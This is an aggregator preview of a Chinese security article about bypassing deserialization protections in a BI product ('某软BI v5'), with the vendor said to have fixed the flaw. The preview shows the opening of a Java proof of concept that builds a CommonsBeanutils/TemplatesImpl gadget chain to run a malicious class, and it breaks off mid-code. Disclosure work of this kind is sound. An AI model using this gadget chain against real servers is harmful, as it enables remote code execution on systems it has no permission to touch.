某软BI v5反序列化绕过

船山信安 · 公众号 · · 2024-09-04 00:00

文章预览

漏洞已提交，厂商已修复 cb链某软存在cb链，先生成cb链的字节数组， package org.example ; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl ; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl ; import com.sun.org.apache.xerces.internal.impl.dv.util.Base64 ; import org.apache.commons.beanutils.BeanComparator ; import java.io.* ; import java.lang.reflect.Field ; import java.util.Arrays ; import java.util.PriorityQueue ; public class Main implements Serializable { public static void setFieldValue ( Object obj , String fieldName , Object value ) throws Exception { Field field = obj . getClass (). getDeclaredField ( fieldName ); field . setAccessible ( true ); field . set ( obj , value ); } //创建恶意类，弹出计算器 public static TemplatesImpl generateTemplates () throws Exception { byte [] ………………………………

原文地址：访问原文地址
快照地址：访问文章快照
总结与预览地址：访问总结与预览

分享到微博

推荐文章

中国企业家杂志 · 被马斯克抛过两次橄榄枝，红杉资本这位高级合伙人教了年轻人什么｜中企荐读

6 小时前

插座APP · 湖南理发师“现象级”爆火，终于明白了为什么大家对雷军的评价这么高

昨天

中国企业家杂志 · 魏建国：中国数字贸易要抢占先机，下好三步棋

昨天

中国企业家杂志 · 47亿票房《流浪地球》，出海从“扫街”影院做起

4 天前

中国人力资源 · 我叫个税，我的扣除范围扩大！超全税率表请查收

4 天前

北京徒步者 · 【中级】【尼泊尔十三天】【世界十大徒步线路】【多期】北徒认证-EBC 世界级高海拔104公里徒步

3 月前

智合 · 盈科律师事务所 | 在数字经济浪潮中持盈守成，激流勇进

3 月前

肖飒lawyer · 肖飒团队 | 金融业开始“翻旧账”？从一起内幕交易亏损案说起……

2 月前